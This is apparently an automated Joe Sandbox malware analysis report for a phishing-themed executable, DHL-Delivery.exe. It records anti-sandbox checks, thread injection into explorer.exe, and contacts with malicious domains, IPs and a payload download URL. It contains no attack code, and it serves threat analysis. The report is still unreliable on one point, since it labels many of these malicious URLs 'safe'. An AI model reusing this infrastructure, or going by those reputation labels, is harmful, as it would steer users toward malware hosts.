    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 121908 Sample: DHL-Delivery.exe Startdate: 05/01/2021 Architecture: WINDOWS Score: 100 38 www.yuneimit.com 2->38 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Potential malicious icon found 2->60 62 7 other signatures 2->62 11 DHL-Delivery.exe 2->11         started        14 SearchUI.exe 2->14         started        signatures3 process4 signatures5 68 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->68 70 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 11->70 72 Tries to detect Any.run 11->72 74 3 other signatures 11->74 16 DHL-Delivery.exe 6 11->16         started        process6 dnsIp7 36 procesotg.com 162.144.5.131, 49713, 80 UNIFIEDLAYER-AS-1US United States 16->36 48 Modifies the context of a thread in another process (thread injection) 16->48 50 Tries to detect Any.run 16->50 52 Maps a DLL or memory area into another process 16->52 54 3 other signatures 16->54 20 explorer.exe 16->20 injected signatures8 process9 process10 22 cmmon32.exe 20->22         started        25 WerFault.exe 9 20->25         started        dnsIp11 64 Modifies the context of a thread in another process (thread injection) 22->64 66 Maps a DLL or memory area into another process 22->66 28 explorer.exe 3 145 22->28         started        32 cmd.exe 1 22->32         started        40 192.168.0.2 unknown unknown 25->40 signatures12 process13 dnsIp14 42 officialilluminati.net 198.54.126.238, 49719, 80 NAMECHEAP-NETUS United States 28->42 44 evolutionhvac.net 34.102.136.180, 49717, 80 GOOGLEUS United States 28->44 46 3 other IPs or domains 28->46 76 System process connects to network (likely due to code injection or exploit) 28->76 34 conhost.exe 32->34         started        signatures15 process16

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    DHL-Delivery.exe34%VirustotalBrowse
    DHL-Delivery.exe17%MetadefenderBrowse
    DHL-Delivery.exe41%ReversingLabsWin32.Downloader.Minix

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    officialilluminati.net0%VirustotalBrowse
    procesotg.com6%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.officialilluminati.net0%Avira URL Cloudsafe
    http://www.maxmaldives.comReferer:0%Avira URL Cloudsafe
    http://www.amonez.comReferer:0%Avira URL Cloudsafe
    http://www.evolutionhvac.netReferer:0%Avira URL Cloudsafe
    http://www.inlandtransporters.com/mph/0%Avira URL Cloudsafe
    http://www.irisgiladiphotography.com/mph/www.ldgstudio.com0%Avira URL Cloudsafe
    http://www.tnx2u.com/mph/0%Avira URL Cloudsafe
    http://www.ytvksh.space/mph/0%Avira URL Cloudsafe
    http://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd00%Avira URL Cloudsafe
    http://www.growgirlgrow.netReferer:0%Avira URL Cloudsafe
    http://www.officialilluminati.net/mph/www.yuneimit.com0%Avira URL Cloudsafe
    http://www.tnx2u.com0%Avira URL Cloudsafe
    http://www.simplymadphotography.comReferer:0%Avira URL Cloudsafe
    http://www.koottukudumbam.com/mph/0%Avira URL Cloudsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.mcchoo.xyzReferer:0%Avira URL Cloudsafe
    http://www.mcchoo.xyz/mph/0%Avira URL Cloudsafe
    http://procesotg.com/bin_dIyfkt31.binHxy50%Avira URL Cloudsafe
    http://www.irisgiladiphotography.comReferer:0%Avira URL Cloudsafe
    http://www.849nmaym.infoReferer:0%Avira URL Cloudsafe
    http://www.yuneimit.com/mph/www.tnx2u.com0%Avira URL Cloudsafe
    http://www.biostaticwall.comReferer:0%Avira URL Cloudsafe
    http://www.inlandtransporters.comReferer:0%Avira URL Cloudsafe
    http://www.849nmaym.info0%Avira URL Cloudsafe
    http://www.ytvksh.space/mph/www.maxmaldives.com0%Avira URL Cloudsafe
    http://www.jaimeirazabal.comReferer:0%Avira URL Cloudsafe
    http://www.amonez.com/mph/www.jobjori.com0%Avira URL Cloudsafe
    http://www.groupoperationltd.com/mph/www.liquidflooringinternational.com0%Avira URL Cloudsafe
    http://www.growmeanairway.com0%Avira URL Cloudsafe
    http://www.evolutionhvac.net/mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd00%Avira URL Cloudsafe
    http://www.liquidflooringinternational.comReferer:0%Avira URL Cloudsafe
    http://www.amonez.com/mph/0%Avira URL Cloudsafe
    http://www.simplymadphotography.com/mph/0%Avira URL Cloudsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.mcfarlandfamilyevents.comReferer:0%Avira URL Cloudsafe
    http://www.liquidflooringinternational.com0%Avira URL Cloudsafe
    http://www.musicoccaz.com0%Avira URL Cloudsafe
    http://procesotg.com/0%Avira URL Cloudsafe
    http://www.growgirlgrow.net/mph/www.mcfarlandfamilyevents.com0%Avira URL Cloudsafe
    http://www.officialilluminati.netReferer:0%Avira URL Cloudsafe
    http://www.maxmaldives.com/mph/www.olenfex.com0%Avira URL Cloudsafe
    https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO810%Avira URL Cloudsafe
    http://www.liquidflooringinternational.com/mph/0%Avira URL Cloudsafe
    http://www.jobjori.com/mph/www.olenfex.com0%Avira URL Cloudsafe
    http://www.groupoperationltd.com/mph/www.gorgereport.com0%Avira URL Cloudsafe
    http://www.amonez.com/mph/www.evolutionhvac.net0%Avira URL Cloudsafe
    http://www.jaimeirazabal.com/mph/www.growgirlgrow.net0%Avira URL Cloudsafe
    http://www.barriobruja.com/mph/www.inlandtransporters.com0%Avira URL Cloudsafe
    http://www.gorgereport.com/mph/www.musicoccaz.com0%Avira URL Cloudsafe
    http://www.olenfex.com/mph/0%Avira URL Cloudsafe
    http://www.gorgereport.comReferer:0%Avira URL Cloudsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.mcchoo.xyz/mph/www.jaimeirazabal.com0%Avira URL Cloudsafe
    http://www.gorgereport.com0%Avira URL Cloudsafe
    http://www.jobjori.comReferer:0%Avira URL Cloudsafe
    http://www.olenfex.com0%Avira URL Cloudsafe
    http://www.jaimeirazabal.com0%Avira URL Cloudsafe
    http://www.bikeemperor.comReferer:0%Avira URL Cloudsafe
    http://www.growmeanairway.com/mph/0%Avira URL Cloudsafe
    http://www.tnx2u.comReferer:0%Avira URL Cloudsafe
    http://www.ldgstudio.com0%Avira URL Cloudsafe
    http://www.musicoccaz.comReferer:0%Avira URL Cloudsafe
    http://www.inlandtransporters.com/mph/uE0%Avira URL Cloudsafe
    http://www.barriobruja.com/mph/0%Avira URL Cloudsafe
    http://procesotg.com/bin_dIyfkt31.bin0%Avira URL Cloudsafe
    http://www.musicoccaz.com/mph/www.amonez.com0%Avira URL Cloudsafe
    http://www.ldgstudio.com/mph/www.barriobruja.com0%Avira URL Cloudsafe
    http://www.evolutionhvac.net0%Avira URL Cloudsafe
    http://www.barriobruja.com0%Avira URL Cloudsafe
    http://procesotg.com/bin_dIyfkt31.binJ0%Avira URL Cloudsafe
    http://www.849nmaym.info/mph/0%Avira URL Cloudsafe
    http://www.koottukudumbam.comReferer:0%Avira URL Cloudsafe
    http://www.maxmaldives.com/mph/0%Avira URL Cloudsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.olenfex.com/mph/www.bikeemperor.com0%Avira URL Cloudsafe
    http://www.groupoperationltd.com/mph/0%Avira URL Cloudsafe
    http://www.maxmaldives.com0%Avira URL Cloudsafe
    http://www.evolutionhvac.net/mph/0%Avira URL Cloudsafe
    http://www.biostaticwall.com/mph/0%Avira URL Cloudsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.koottukudumbam.com0%Avira URL Cloudsafe
    https://mths.be/fromcodepoint0%Avira URL Cloudsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.gorgereport.com/mph/0%Avira URL Cloudsafe
    http://www.mcfarlandfamilyevents.com0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    evolutionhvac.net
    		34.102.136.180
    		truetrue
      		unknown
      officialilluminati.net
      		198.54.126.238
      		truetrueunknown
      procesotg.com
      		162.144.5.131
      		truetrueunknown
      www.amonez.com
      		unknown
      		unknowntrue
        		unknown
        www.evolutionhvac.net
        		unknown
        		unknowntrue
          		unknown
          www.yuneimit.com
          		unknown
          		unknowntrue
            		unknown
            www.officialilluminati.net
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0true
              • Avira URL Cloud: safe
              		unknown
              http://www.evolutionhvac.net/mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd0true
              • Avira URL Cloud: safe
              		unknown
              http://procesotg.com/bin_dIyfkt31.bintrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.officialilluminati.netexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.maxmaldives.comReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.amonez.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.evolutionhvac.netReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.inlandtransporters.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.irisgiladiphotography.com/mph/www.ldgstudio.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.tnx2u.com/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.ytvksh.space/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.growgirlgrow.netReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.officialilluminati.net/mph/www.yuneimit.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.tnx2u.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.simplymadphotography.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/hcsadminexplorer.exe, 00000007.00000002.2742124576.000000000E3B0000.00000002.00000001.sdmp, cmd.exe, 0000000B.00000002.2190137433.0000000000BA0000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.2747253396.00000243B7910000.00000002.00000001.sdmpfalse
                		high
                http://www.koottukudumbam.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.sajatypeworks.comexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.mcchoo.xyzReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.mcchoo.xyz/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://procesotg.com/bin_dIyfkt31.binHxy5DHL-Delivery.exe, 00000006.00000002.2177968069.000000000076C000.00000004.00000020.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://www.irisgiladiphotography.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.849nmaym.infoReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.yuneimit.com/mph/www.tnx2u.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.biostaticwall.comReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.inlandtransporters.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.849nmaym.infoexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ytvksh.space/mph/www.maxmaldives.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.jaimeirazabal.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.amonez.com/mph/www.jobjori.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.groupoperationltd.com/mph/www.liquidflooringinternational.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.growmeanairway.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.liquidflooringinternational.comReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.amonez.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.simplymadphotography.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.zhongyicts.com.cnexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.mcfarlandfamilyevents.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.liquidflooringinternational.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.musicoccaz.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://procesotg.com/DHL-Delivery.exe, 00000006.00000002.2178092219.0000000000785000.00000004.00000020.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://www.growgirlgrow.net/mph/www.mcfarlandfamilyevents.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.officialilluminati.netReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.maxmaldives.com/mph/www.olenfex.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81cmmon32.exe, 0000000A.00000002.3610263692.000000000568F000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.liquidflooringinternational.com/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.jobjori.com/mph/www.olenfex.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.groupoperationltd.com/mph/www.gorgereport.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.amonez.com/mph/www.evolutionhvac.netexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.jaimeirazabal.com/mph/www.growgirlgrow.netexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.barriobruja.com/mph/www.inlandtransporters.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.gorgereport.com/mph/www.musicoccaz.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.olenfex.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.gorgereport.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.carterandcone.comlexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.mcchoo.xyz/mph/www.jaimeirazabal.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.gorgereport.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.jobjori.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.olenfex.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://substrate.office.comSearchUI.exe, 00000019.00000003.3116255345.000001EEA3E29000.00000004.00000001.sdmpfalse
                  		high
                  http://www.jaimeirazabal.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.bikeemperor.comReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.growmeanairway.com/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tnx2u.comReferer:explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ldgstudio.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.musicoccaz.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.inlandtransporters.com/mph/uEexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.barriobruja.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.musicoccaz.com/mph/www.amonez.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ldgstudio.com/mph/www.barriobruja.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.evolutionhvac.netexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.barriobruja.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://procesotg.com/bin_dIyfkt31.binJDHL-Delivery.exe, 00000006.00000002.2177968069.000000000076C000.00000004.00000020.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.849nmaym.info/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.koottukudumbam.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.maxmaldives.com/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.olenfex.com/mph/www.bikeemperor.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.groupoperationltd.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.maxmaldives.comexplorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.evolutionhvac.net/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.biostaticwall.com/mph/explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.koottukudumbam.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mths.be/fromcodepointSearchUI.exe, 00000019.00000003.2989658115.000001E6A2230000.00000004.00000001.sdmp, Init[1].htm.25.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.goodfont.co.krexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.gorgereport.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.mcfarlandfamilyevents.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.jaimeirazabal.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.inlandtransporters.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.barriobruja.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.jobjori.com/mph/explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.typography.netDexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://loki.delve.office.com/SearchUI.exe, 00000019.00000003.3129415140.000001EEA35B5000.00000004.00000001.sdmpfalse
                    		high
                    http://www.mcchoo.xyzexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://fontfabrik.comexplorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.olenfex.comReferer:explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.simplymadphotography.com/mph/www.irisgiladiphotography.comexplorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://login.microsoft.explorer.exe, 00000007.00000000.2121644383.0000000007F8F000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchUI.exe, 00000019.00000003.3130393716.000001EEA41D0000.00000004.00000001.sdmpfalse
                      		high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      34.102.136.180
                      		unknownUnited States
                      		15169GOOGLEUStrue
                      198.54.126.238
                      		unknownUnited States
                      		22612NAMECHEAP-NETUStrue
                      162.144.5.131
                      		unknownUnited States
                      		46606UNIFIEDLAYER-AS-1UStrue

                      Private

                      IP
                      192.168.0.2

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:121908
                      Start date:05.01.2021
                      Start time:10:26:41
                      Joe Sandbox Product:Cloud
                      Overall analysis duration:0h 16m 37s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:DHL-Delivery.exe
                      Cookbook file name:default.jbs
                      Analysis system description:W10 x64 1809 Native physical Machine for testing VM-aware malware (Office 2016, Internet Explorer 11, Java 8u231, Adobe Reader DC 19)
                      Number of analysed new started processes analysed:37
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.evad.winEXE@10/137@6/4
                      EGA Information:
                      • Successful, ratio: 83.3%
